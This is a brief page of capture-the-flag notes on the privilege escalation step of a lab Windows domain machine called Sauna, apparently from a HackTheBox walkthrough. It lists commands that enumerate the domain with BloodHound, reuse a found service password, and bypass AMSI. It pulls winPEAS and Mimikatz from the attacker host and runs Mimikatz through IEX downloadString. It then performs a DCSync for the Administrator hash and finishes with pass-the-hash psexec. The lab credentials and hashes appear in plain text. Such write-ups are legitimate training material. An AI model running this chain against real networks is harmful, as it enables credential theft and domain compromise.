Priv Esc

sudo bloodhound-python -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' -ns 10.10.10.175 -c all

SVC_LOANMGR

*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/winPEAS.exe -o winPEAS.exe
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-        1/22/2020   9:30 PM                Microsoft
d-----        7/13/2021  10:53 AM                Package Cache
d-----        5/28/2024   4:43 PM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        1/22/2020   9:33 PM                USOPrivate
d-----        1/22/2020   9:33 PM                USOShared
d-----        7/13/2021  10:54 AM                VMware
-a----        5/28/2024   5:24 PM        2387456 winPEAS.exe


*Evil-WinRM* PS C:\programdata> .\winPEAS.exe

svc_loanmgr:Moneymakestheworldgoround!

$ netexec winrm sauna -u svc_loanmgr -p 'Moneymakestheworldgoround!'

$ evil-winrm -i sauna -u svc_loanmgr -p 'Moneymakestheworldgoround!' -s ~/opt/wpe

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Bypass-4MSI
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator"'

impacket-psexec administrator@sauna -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'

PreviousEnumeration NextCredentials

Last updated 1 year ago

Was this helpful?